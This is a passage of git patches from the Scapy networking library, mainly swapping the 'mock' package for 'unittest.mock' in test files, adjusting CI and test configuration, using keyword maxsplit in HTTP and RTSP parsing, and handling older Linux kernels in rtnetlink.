@@ -698,6 +701,7 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test UDS_DualDoIPSslSocket6 +~ broken_windows server_tcp_up = threading.Event() server_tls_up = threading.Event() @@ -755,4 +759,4 @@ sock = UDS_DoIPSocket6(ip="::1", context=context) pkts = sock.sniff(timeout=1, count=2) server_tcp_thread.join(timeout=1) server_tls_thread.join(timeout=1) -assert len(pkts) == 2 \ No newline at end of file +assert len(pkts) == 2 diff --git a/test/regression.uts b/test/regression.uts index 501610ede7a..c78ed102dfe 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1830,7 +1830,7 @@ def _test(): retry_test(_test) = Whois request -~ netaccess IP +~ netaccess IP as_resolvers * This test retries on failure because it often fails def _test(): IP(src="8.8.8.8").whois() @@ -1874,7 +1874,7 @@ assert len(tmp) == 3 assert [l[1] for l in tmp] == ['AS24776', 'AS36459', 'AS26496'] = AS resolver - IPv6 -~ netaccess IP +~ netaccess IP as_resolvers * This test retries on failure because it often fails def _test(): diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index 0685c53dba6..7b1ba524a87 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -486,7 +486,10 @@ def run_tls_native_test_server(post_handshake_auth=False, assert resp == bytes(REQS[1]) ssl_client_socket.send(bytes(RESPS[1])) # close socket - server.close() + try: + server.shutdown(socket.SHUT_RDWR) + finally: + server.close() server = threading.Thread(target=ssl_server) server.start() @@ -524,11 +527,15 @@ def test_tls_client_native(post_handshake_auth=False, assert not server.is_alive() +# XXX: Ugh, Appveyor uses an ancient Windows 10 build that doesn't support TLS 1.3 natively. + = Testing TLS client against ssl.SSLContext server with TLS 1.3 and a post-handshake authentication +~ native_tls13 test_tls_client_native(post_handshake_auth=True) = Testing TLS client against ssl.SSLContext server with TLS 1.3 and a Hello-Retry request +~ native_tls13 test_tls_client_native(with_hello_retry=True) diff --git a/test/windows.uts b/test/windows.uts index 1d862216920..237abcb0b77 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -40,6 +40,7 @@ from scapy.config import conf assert dev_from_networkname(conf.iface.network_name).guid == conf.iface.guid = test pcap_service_status +~ npcap_service from scapy.arch.windows import pcap_service_status @@ -54,16 +55,20 @@ print(get_if_list()) assert all(x.startswith(r"\Device\NPF_") for x in get_if_list()) = test pcap_service_stop -~ appveyor_only require_gui +~ appveyor_only require_gui npcap_service + +from scapy.arch.windows import pcap_service_stop pcap_service_stop() -assert pcap_service_status()[2] == False +assert pcap_service_status() == False = test pcap_service_start -~ appveyor_only require_gui +~ appveyor_only require_gui npcap_service + +from scapy.arch.windows import pcap_service_start pcap_service_start() -assert pcap_service_status()[2] == True +assert pcap_service_status() == True = Test auto-pcap start UI @@ -86,39 +91,23 @@ finally: = Set up native mode conf.use_pcap = False +conf.route.resync() +conf.ifaces.reload() assert conf.use_pcap == False -= Prepare ping: open firewall & get current seq number -~ netaccess needs_root - -from scapy.arch.windows.native import open_icmp_firewall, get_current_icmp_seq - -# Note: this method is complicated, but allow us to perform a real test -# it is discouraged otherwise. Npcap/Winpcap does NOT require such mechanics - -# output of this may vary, but it doesn't matter: -# if it fails the teat below won't work -open_icmp_firewall("www.google.com") - -seq = get_current_icmp_seq() -assert seq > 0 - -True - = Ping ~ netaccess needs_root def _test(): with conf.L3socket() as a: - answer = a.sr1(IP(dst="www.google.com", ttl=128)/ICMP(id=1, seq=seq)/"abcdefghijklmnopqrstuvwabcdefghi", timeout=2) + answer = a.sr1(IP(dst="1.1.1.1", ttl=128)/ICMP()/"abcdefghijklmnopqrstuvwabcdefghi", timeout=2) answer.show() assert ICMP in answer retry_test(_test) = DNS lookup -~ netaccess needs_root require_gui -% XXX currently disabled +~ netaccess needs_root def _test(): answer = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1, qd=DNSQR(qname="www.google.com")), timeout=2) @@ -131,4 +120,6 @@ retry_test(_test) = Leave native mode conf.use_pcap = True +conf.route.resync() +conf.ifaces.reload() assert conf.use_pcap == True From 26303ffd4e439cd16f5c73278050902b971654e5 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 28 Jul 2024 19:04:26 +0300 Subject: [PATCH 1327/1632] ci: trim the packit config a bit (#4471) by dropping the tox-current-env kludge. The idea was to bypass virtual environments created by tox and use the system packages directly. It's no longer needed because tox itself isn't run anywhere any more on Packit and UTscapy is used instead. --- .packit.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.packit.yml b/.packit.yml index 02799b5f54f..f178904aca0 100644 --- a/.packit.yml +++ b/.packit.yml @@ -23,7 +23,6 @@ actions: - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: tcpdump' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: wireshark' .packit_rpm/scapy.spec" - - "sed -i '/^BuildArch/aBuildRequires: python3-tox-current-env' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-mock' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-ipython' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-brotli' .packit_rpm/scapy.spec" @@ -34,7 +33,6 @@ actions: - "sed -i '/^BuildArch/aBuildRequires: python3-zstandard' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: samba' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: samba-client' .packit_rpm/scapy.spec" - - "sed -i 's/^\\(TOX_PARALLEL_NO_SPINNER=1 tox\\)/\\1 --current-env/' .config/ci/test.sh" jobs: - job: copr_build From 8ac13e7c15dc77a322959092d5847a1513ac6f33 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Jul 2024 20:01:39 +0200 Subject: [PATCH 1328/1632] Remove 'mock' dependency (#4480) --- scapy/utils.py | 6 +-- test/answering_machines.uts | 4 +- test/bpf.uts | 2 +- test/contrib/dtp.uts | 2 +- test/linux.uts | 11 +++--- test/pipetool.uts | 12 +++--- test/regression.uts | 69 +++++++++++++++++----------------- test/scapy/layers/inet.uts | 6 +-- test/scapy/layers/inet6.uts | 4 +- test/scapy/layers/kerberos.uts | 8 ++-- test/scapy/layers/l2.uts | 4 +- test/scapy/layers/msnrpc.uts | 6 +-- test/scapy/layers/ntlm.uts | 2 +- test/scapy/layers/tls/tls.uts | 2 +- test/sendsniff.uts | 2 +- test/tools/isotpscanner.uts | 2 +- test/windows.uts | 2 +- tox.ini | 5 +-- 18 files changed, 72 insertions(+), 77 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 4caadf04e93..03c0fa55106 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -981,14 +981,10 @@ class ContextManagerCaptureOutput(object): def __init__(self): # type: () -> None self.result_export_object = "" - try: - import mock # noqa: F401 - except Exception: - raise ImportError("The mock module needs to be installed !") def __enter__(self): # type: () -> ContextManagerCaptureOutput - import mock + from unittest import mock def write(s, decorator=self): # type: (str, ContextManagerCaptureOutput) -> None diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 9a7ce4b1343..a4844e006de 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -8,7 +8,7 @@ + Answering Machines = Generic answering machine mocker -import mock +from unittest import mock @mock.patch("scapy.ansmachine.sniff") def test_am(cls_name, packet_query, check_reply, mock_sniff, **kargs): packet_query = packet_query.__class__(bytes(packet_query)) @@ -236,7 +236,7 @@ assert res[DHCP6_Solicit] a.print_reply(req, res) = WiFi_am -import mock +from unittest import mock @mock.patch("scapy.layers.dot11.sniff") def test_WiFi_am(packet_query, check_reply, mock_sniff, **kargs): def sniff(*args,**kargs): diff --git a/test/bpf.uts b/test/bpf.uts index b35ef482a8a..259e4ca8318 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -114,7 +114,7 @@ s.close() = L2bpfListenSocket - read failure ~ needs_root -import mock +from unittest import mock @mock.patch("scapy.arch.bpf.supersocket.os.read") def _test_osread(osread): diff --git a/test/contrib/dtp.uts b/test/contrib/dtp.uts index c8880f114cf..205c4864438 100644 --- a/test/contrib/dtp.uts +++ b/test/contrib/dtp.uts @@ -16,7 +16,7 @@ assert pkt[DTP].tlvlist[3].status == b'\x03' = Test negotiate_trunk -import mock +from unittest import mock def test_pkt(pkt): pkt = Ether(raw(pkt)) diff --git a/test/linux.uts b/test/linux.uts index 2a8b17374e6..8afe94962b0 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -66,7 +66,7 @@ else: = catch loopback device missing ~ linux needs_root -from mock import patch +from unittest.mock import patch # can't remove the lo device (or its address without causing trouble) - use some pseudo dummy instead @@ -77,7 +77,7 @@ with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo_x'): ~ linux needs_root import os, socket -from mock import patch +from unittest.mock import patch try: exit_status = os.system("ip link add name scapy_lo type dummy") @@ -116,7 +116,7 @@ finally: conf.ifaces._add_fake_iface("scapy0", 'e2:39:91:79:19:10') -from mock import patch +from unittest.mock import patch conf.route6.routes = [('fe80::', 64, '::', 'scapy0', ['fe80::e039:91ff:fe79:1910'], 256)] conf.route6.ipv6_ifaces = set(['scapy0']) bck_conf_iface = conf.iface @@ -274,7 +274,7 @@ except Exception: = Routing table, interface with no names ~ linux -from mock import patch +from unittest.mock import patch @patch("scapy.arch.linux.ioctl") def test_read_routes(mock_ioctl): @@ -293,7 +293,8 @@ test_read_routes() from scapy.arch.linux import L3PacketSocket -import mock, socket +import socket +from unittest import mock @mock.patch("scapy.arch.linux.socket.socket.sendto") def test_L3PacketSocket_sendto_python3(mock_sendto): diff --git a/test/pipetool.uts b/test/pipetool.uts index 3ce0d7eaf94..f622f385eec 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -228,7 +228,7 @@ p.wait_and_stop() = Test SniffSource -import mock +from unittest import mock fd = ObjectPipe("sniffsource") fd.write("test") @@ -295,7 +295,7 @@ else: = Test exhausted AutoSource and SniffSource -import mock +from unittest import mock from scapy.error import Scapy_Exception def _fail(): @@ -323,7 +323,7 @@ except: q = ObjectPipe("wiresharksink") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -import mock +from unittest import mock with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink() sink.start() @@ -345,7 +345,7 @@ linktype = scapy.data.DLT_EN3MB q = ObjectPipe("wiresharksink_linktype") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -import mock +from unittest import mock with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink(linktype=linktype) sink.start() @@ -363,7 +363,7 @@ linktype = scapy.data.DLT_EN3MB q = ObjectPipe("wiresharksink_args") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -import mock +from unittest import mock with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink(args=['-c', '1']) sink.start() @@ -404,7 +404,7 @@ os.unlink(os.path.join(dname, "t2.pcap.gz")) = Test InjectSink and Inject3Sink ~ needs_root -import mock +from unittest import mock a = IP(dst="192.168.0.1")/ICMP() msgs = [] diff --git a/test/regression.uts b/test/regression.uts index c78ed102dfe..53f4b329901 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -46,7 +46,7 @@ assert _version_checker(FakeModule3, (2, 4, 2)) = Check Scapy version -import mock +from unittest import mock import scapy from scapy import _parse_tag, _version_from_git_describe @@ -280,7 +280,7 @@ assert p == "127.0.0.1" = Interface related functions -import mock +from unittest import mock conf.iface @@ -321,7 +321,7 @@ assert conf.iface == old assert isinstance(conf.iface, NetworkInterface) assert conf.iface.is_valid() -import mock +from unittest import mock @mock.patch("scapy.interfaces.conf.route.routes", []) @mock.patch("scapy.interfaces.conf.ifaces.values") def _test_get_working_if(rou): @@ -670,7 +670,8 @@ assert len(conf.temp_files) == 0 = Emulate interact() ~ interact -import mock, sys +import sys +from unittest import mock from scapy.main import interact from scapy.main import DEFAULT_PRESTART_FILE, DEFAULT_PRESTART, _read_config_file @@ -712,7 +713,7 @@ interact_emulator(extra_args=["-d"]) # Extended ~ interact import sys -import mock +from unittest import mock from scapy.main import DEFAULT_PRESTART_FILE, DEFAULT_PRESTART, _read_config_file _read_config_file(DEFAULT_PRESTART_FILE, _locals=globals(), default=DEFAULT_PRESTART) @@ -756,7 +757,7 @@ assert called = Test explore() with GUI mode ~ command -import mock +from unittest import mock def test_explore_gui(is_layer, layer): prompt_toolkit_mocked_module = Bunch( @@ -847,7 +848,7 @@ assert lhex((28,7)) == "(0x1c, 0x7)" assert lhex([28,7]) == "[0x1c, 0x7]" = Test restart function -import mock +from unittest import mock conf.interactive = True try: @@ -969,7 +970,7 @@ zerofree_randstring(4) in [b"\xd2\x12\xe4\x5b", b'\xd3\x8b\x13\x12'] assert strand(b"AC", b"BC") == b'@C' = Test export_object and import_object functions -import mock +from unittest import mock def test_export_import_object(): with ContextManagerCaptureOutput() as cmco: export_object(2807) @@ -1157,7 +1158,7 @@ conf.netcache = Test pyx detection functions -from mock import patch +from unittest.mock import patch def _r(*args, **kwargs): raise OSError @@ -1168,7 +1169,7 @@ with patch("scapy.libs.test_pyx.subprocess.check_call", _r): = Test matplotlib detection functions -from mock import MagicMock, patch +from unittest.mock import MagicMock, patch bck_scapy_libs_matplot = sys.modules.get("scapy.libs.matplot", None) if bck_scapy_libs_matplot: @@ -2049,7 +2050,7 @@ send(fuzz(ARP())) = Test SuperSocket.select ~ select -import mock +from unittest import mock @mock.patch("scapy.supersocket.select") def _test_select(select): @@ -2444,7 +2445,7 @@ assert len(sniff(offline=[IP()/UDP(), IP()/TCP()], lfilter=lambda x: TCP in x)) = Check offline sniff() without a tcpdump binary ~ tcpdump -import mock +from unittest import mock conf_prog_tcpdump = conf.prog.tcpdump conf.prog.tcpdump = "tcpdump_fake" @@ -2628,7 +2629,7 @@ assert b'127.0.0.1 > 127.0.0.1:' in data[2] * Non existing tcpdump binary -import mock +from unittest import mock conf_prog_tcpdump = conf.prog.tcpdump conf.prog.tcpdump = "tcpdump_fake" @@ -2836,7 +2837,7 @@ os.remove(filename) = Check wrpcap() with different packets types -import mock +from unittest import mock import os import tempfile @@ -2910,7 +2911,7 @@ assert pkterf[1][Ether].src == "00:0f:53:3f:ca:c0" = Truncated netstat -rn output on OS X ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.get_if_addr") @@ -2968,7 +2969,7 @@ test_osx_netstat_truncated() = macOS 10.13 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.get_if_addr") @@ -3027,7 +3028,7 @@ test_osx_10_13_ipv4() = macOS 10.15 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.get_if_addr") @@ -3082,7 +3083,7 @@ test_osx_10_15_ipv4() = OpenBSD 6.3 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.get_if_addr") @@ -3152,7 +3153,7 @@ assert locked[3] == "bge0" = Solaris 11.1 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO # Mocked Solaris 11.1 parsing behavior @@ -3284,7 +3285,7 @@ assert results_dict == expected = Preliminary definitions ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO def valid_output_read_routes6(routes): @@ -3314,7 +3315,7 @@ def check_mandatory_ipv6_routes(routes6): = Mac OS X 10.9.5 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.unix.in6_getifaddr") @@ -3362,7 +3363,7 @@ test_osx_10_9_5() = Mac OS X 10.9.5 with global IPv6 connectivity ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.unix.in6_getifaddr") @@ -3415,7 +3416,7 @@ test_osx_10_9_5_global() = Mac OS X 10.10.4 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.unix.in6_getifaddr") @@ -3458,7 +3459,7 @@ test_osx_10_10_4() = FreeBSD 10.2 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.unix.in6_getifaddr") @@ -3504,7 +3505,7 @@ test_freebsd_10_2() = FreeBSD 13.0 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.get_if_addr") @@ -3550,7 +3551,7 @@ test_freebsd_13() = OpenBSD 5.5 ~ mock_read_routes_bsd -import mock +from unittest import mock from io import StringIO @mock.patch("scapy.arch.unix.OPENBSD") @@ -4415,7 +4416,7 @@ assert sum(1 for oid in conf.mib) > 100 = MIB - graph ~ mib -import mock +from unittest import mock @mock.patch("scapy.asn1.mib.do_graph") def get_mib_graph(do_graph): @@ -4890,7 +4891,7 @@ assert all(bytes(a[0]) == bytes(b[0]) for a, b in zip(unp, srl)) = plot() -import mock +from unittest import mock import scapy.libs.matplot @mock.patch("scapy.libs.matplot.plt") @@ -4906,7 +4907,7 @@ test_plot() = diffplot() -import mock +from unittest import mock import scapy.libs.matplot @mock.patch("scapy.libs.matplot.plt") @@ -4922,7 +4923,7 @@ test_diffplot() = multiplot() -import mock +from unittest import mock import scapy.libs.matplot @mock.patch("scapy.libs.matplot.plt") @@ -5031,7 +5032,7 @@ test_nzpadding() = conversations() -import mock +from unittest import mock @mock.patch("scapy.plist.do_graph") def test_conversations(mock_do_graph): def fake_do_graph(graph, **kwargs): @@ -5059,7 +5060,7 @@ assert len(pl.sessions().keys()) == 5 = afterglow() -import mock +from unittest import mock @mock.patch("scapy.plist.do_graph") def test_afterglow(mock_do_graph): def fake_do_graph(graph, **kwargs): @@ -5151,7 +5152,7 @@ del os.environ["SCAPY_VERSION"] assert scapy._version() == version os.unlink(version_filename) -import mock +from unittest import mock with mock.patch("scapy._version_from_git_archive") as archive: archive.return_value = "4.4.4" assert scapy._version() == "4.4.4" @@ -5189,7 +5190,7 @@ assert os.path.isdir(dname) = test fragleak functions ~ netaccess linux fragleak -import mock +from unittest import mock @mock.patch("scapy.layers.inet.conf.L3socket") @mock.patch("scapy.layers.inet.select.select") diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index b73a06431d5..ab5cbd56781 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -590,7 +590,7 @@ assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) = Layer binding with show() * getmacbyip must only be called when building -import mock +from unittest import mock def _err(*_): raise ValueError @@ -763,7 +763,7 @@ def test_summary(): test_summary() -import mock +from unittest import mock import scapy.libs.matplot @mock.patch("scapy.libs.matplot.plt") @@ -802,7 +802,7 @@ assert "192.168.0.254" not in [p[IP].src for p in new_pl] = IPv4 - reporting ~ netaccess -import mock +from unittest import mock @mock.patch("scapy.layers.inet.sr") def test_report_ports(mock_sr): diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 7b5b8f516cb..2dda726bcc6 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1970,7 +1970,7 @@ r6.ifdel("scapy0") = IPv6 - utils -import mock +from unittest import mock @mock.patch("scapy.layers.inet6.get_if_hwaddr") @mock.patch("scapy.layers.inet6.srp1") def test_neighsol(mock_srp1, mock_get_if_hwaddr): @@ -2069,7 +2069,7 @@ assert a.answers(q) = Define test utilities -import mock +from unittest import mock @mock.patch("scapy.layers.inet6.sniff") @mock.patch("scapy.layers.inet6.sendp") diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 6874bf8ba6c..ab37998483d 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -899,7 +899,7 @@ t.open_file(TICKETER_TEMPFILE) = Ticketer++ - Get ticket 0, change it, resign it and set it back # mock the random to get consistency -import mock +from unittest import mock def fake_random(x): # wow, impressive entropy @@ -1211,7 +1211,7 @@ ts.pausec == 0x9a4db = [MS-KILE] RC4 GSS_WrapEx (RFC4757) test vectors (sect 4.5) -import mock +from unittest import mock from scapy.libs.rfc3961 import Key, EncryptionType ssp = KerberosSSP() @@ -1252,7 +1252,7 @@ assert _msgs[0].data.hex() == "112233445566778899aabbccddeeff" = Create randomness-mock context manager # mock the random to get consistency -import mock +from unittest import mock from datetime import datetime def fake_urandom(x): @@ -1586,7 +1586,7 @@ assert ddata == data = GSS_WrapEx/GSS_UnwrapEx: client sends wrapped payload with confidentiality -import mock +from unittest import mock from scapy.libs.rfc3961 import Key, EncryptionType # Data diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index de9d6190fe8..5f02bf991cd 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -76,7 +76,7 @@ def sendp_spoof(x, *args, **kwargs): assert x[1].psrc == "192.168.0.1" assert x[1].pdst == "192.168.0.2" -import mock +from unittest import mock with mock.patch('scapy.layers.l2.srp', side_effect=srp_spoof), \ mock.patch('scapy.layers.l2.srploop', side_effect=srploop_spoof), \ mock.patch('scapy.layers.l2.sendp', side_effect=sendp_spoof): @@ -123,7 +123,7 @@ def srploop_spoof(x, *args, **kwargs): def sendp_spoof(x, *args, **kwargs): pass -import mock +from unittest import mock with mock.patch('scapy.layers.l2.srp', side_effect=srp_spoof), \ mock.patch('scapy.layers.l2.srploop', side_effect=srploop_spoof), \ mock.patch('scapy.layers.l2.sendp', side_effect=sendp_spoof): diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts index 14cb773f49b..16e1a842b81 100644 --- a/test/scapy/layers/msnrpc.uts +++ b/test/scapy/layers/msnrpc.uts @@ -26,7 +26,7 @@ assert ComputeSessionKeyStrongKey(SharedSecret, ClientChallenge, ServerChallenge = [MS-NRPC] test vectors - sect 4.3 -import mock +from unittest import mock from scapy.layers.msrpce.msnrpc import NetlogonSSP # Input @@ -55,7 +55,7 @@ assert bytes(sig)[:len(FullNetlogonSignatureHeader)] == FullNetlogonSignatureHea = [MS-NRPC] test vectors - sect 4.3.1 -import mock +from unittest import mock from scapy.layers.msrpce.msnrpc import NetlogonSSP # Input @@ -253,7 +253,7 @@ assert bytes(pkt) == bytes(auth_resp) = [NetlogonSSP] - Create randomness-mock context manager # mock the random to get consistency -import mock +from unittest import mock def fake_urandom(x): # wow, impressive entropy diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts index 236b4bbf7fd..83b66197297 100644 --- a/test/scapy/layers/ntlm.uts +++ b/test/scapy/layers/ntlm.uts @@ -110,7 +110,7 @@ assert bytes(sig) == b'\x01\x00\x00\x00\x7f\xb3\x8e\xc5\xc5]Iv\x00\x00\x00\x00' = Create randomness-mock context manager # mock the random to get consistency -import mock +from unittest import mock def fake_urandom(x): # wow, impressive entropy diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index b88a3cb4cfd..8dd1f2ba25c 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1345,7 +1345,7 @@ assert not TLSHelloRequest().tls_session_update(None) = Cryptography module is unavailable ~ mock -import mock +from unittest import mock @mock.patch("scapy.layers.tls.crypto.suites.get_algs_from_ciphersuite_name") def test_tls_without_cryptography(get_algs_from_ciphersuite_name_mock): diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 3c5dcc30a60..278648122ef 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -276,7 +276,7 @@ with VEthPair('a_0', 'a_1') as veth_0: = Create a tap interface -import mock +from unittest import mock import struct import subprocess from threading import Thread diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index a2d788ae89b..aefaac72d42 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -11,7 +11,7 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: ISOTPSocket = ISOTPSoftSocket -from mock import patch +from unittest.mock import patch + Usage tests diff --git a/test/windows.uts b/test/windows.uts index 237abcb0b77..22e0f433ccf 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -6,7 +6,7 @@ = Imports -import mock +from unittest import mock ############ ############ diff --git a/tox.ini b/tox.ini index ab08759e20b..1b9349b8373 100644 --- a/tox.ini +++ b/tox.ini @@ -28,9 +28,7 @@ passenv = OPENSSL_CONF # Used by scapy SCAPY_USE_LIBPCAP -deps = mock - # cryptography requirements - setuptools>=18.5 +deps = ipython cryptography coverage[toml] @@ -105,7 +103,6 @@ description = "Check Scapy compliance against static typing" skip_install = true deps = mypy==1.7.0 typing - types-mock commands = python .config/mypy/mypy_check.py linux python .config/mypy/mypy_check.py win32 From 152d01804fef3542d943c0461d11fde97362139c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Jul 2024 21:15:05 +0200 Subject: [PATCH 1329/1632] Add cert.uts and msnrpc.uts to cryptography tests (#4479) --- test/configs/cryptography.utsc | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index 46f5a5eba50..53b307d2897 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -1,16 +1,18 @@ { "testfiles": [ - "test/scapy/layers/tls/tls*.uts", + "test/contrib/macsec.uts", "test/scapy/layers/dot11.uts", "test/scapy/layers/ipsec.uts", "test/scapy/layers/kerberos.uts", - "test/contrib/macsec.uts" + "test/scapy/layers/msnrpc.uts", + "test/scapy/layers/tls/cert.uts", + "test/scapy/layers/tls/tls*.uts" ], "breakfailed": true, "onlyfailed": true, "preexec": { "test/contrib/*.uts": "load_contrib(\"%name%\")", - "test/tls*.uts": "load_layer(\"tls\")" + "test/scapy/layers/tls/*.uts": "load_layer(\"tls\")" }, "kw_ko": [ "mock", From 9738e4ad94f859af4b6fe67338bbd9e8f6f6ec88 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Jul 2024 21:15:15 +0200 Subject: [PATCH 1330/1632] Positional maxsplit is deprecated in 3.13+ (#4478) --- scapy/contrib/rtsp.py | 4 ++-- scapy/layers/http.py | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/rtsp.py b/scapy/contrib/rtsp.py index c2f3e8c265c..ddffce4201d 100644 --- a/scapy/contrib/rtsp.py +++ b/scapy/contrib/rtsp.py @@ -72,7 +72,7 @@ class RTSPRequest(_HTTPContent): def do_dissect(self, s): first_line, body = _dissect_headers(self, s) try: - method, uri, version = re.split(rb"\s+", first_line, 2) + method, uri, version = re.split(rb"\s+", first_line, maxsplit=2) self.setfieldval("Method", method) self.setfieldval("Request_Uri", uri) self.setfieldval("Version", version) @@ -116,7 +116,7 @@ def answers(self, other): def do_dissect(self, s): first_line, body = _dissect_headers(self, s) try: - Version, Status, Reason = re.split(rb"\s+", first_line, 2) + Version, Status, Reason = re.split(rb"\s+", first_line, maxsplit=2) self.setfieldval("Version", Version) self.setfieldval("Status_Code", Status) self.setfieldval("Reason_Phrase", Reason) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 4e12743594f..565d4181da8 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -529,7 +529,7 @@ def do_dissect(self, s): """From the HTTP packet string, populate the scapy object""" first_line, body = _dissect_headers(self, s) try: - Method, Path, HTTPVersion = re.split(br"\s+", first_line, 2) + Method, Path, HTTPVersion = re.split(br"\s+", first_line, maxsplit=2) self.setfieldval('Method', Method) self.setfieldval('Path', Path) self.setfieldval('Http_Version', HTTPVersion) @@ -573,7 +573,7 @@ def do_dissect(self, s): ''' From the HTTP packet string, populate the scapy object ''' first_line, body = _dissect_headers(self, s) try: - HTTPVersion, Status, Reason = re.split(br"\s+", first_line, 2) + HTTPVersion, Status, Reason = re.split(br"\s+", first_line, maxsplit=2) self.setfieldval('Http_Version', HTTPVersion) self.setfieldval('Status_Code', Status) self.setfieldval('Reason_Phrase', Reason) From 7233cb6fa6d6d876876f0845811512452a9505f8 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Jul 2024 02:15:02 +0200 Subject: [PATCH 1331/1632] Fix Scapy on old linux kernels (#4482) --- scapy/arch/linux/rtnetlink.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index aea39c3747b..7241949f720 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -715,9 +715,17 @@ def _sr1_rtrequest(pkt: Packet) -> List[Packet]: # Configure socket sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 32768) sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1048576) - sock.setsockopt(SOL_NETLINK, NETLINK_EXT_ACK, 1) + try: + sock.setsockopt(SOL_NETLINK, NETLINK_EXT_ACK, 1) + except OSError: + # Linux 4.12+ only + pass sock.bind((0, 0)) # bind to kernel - 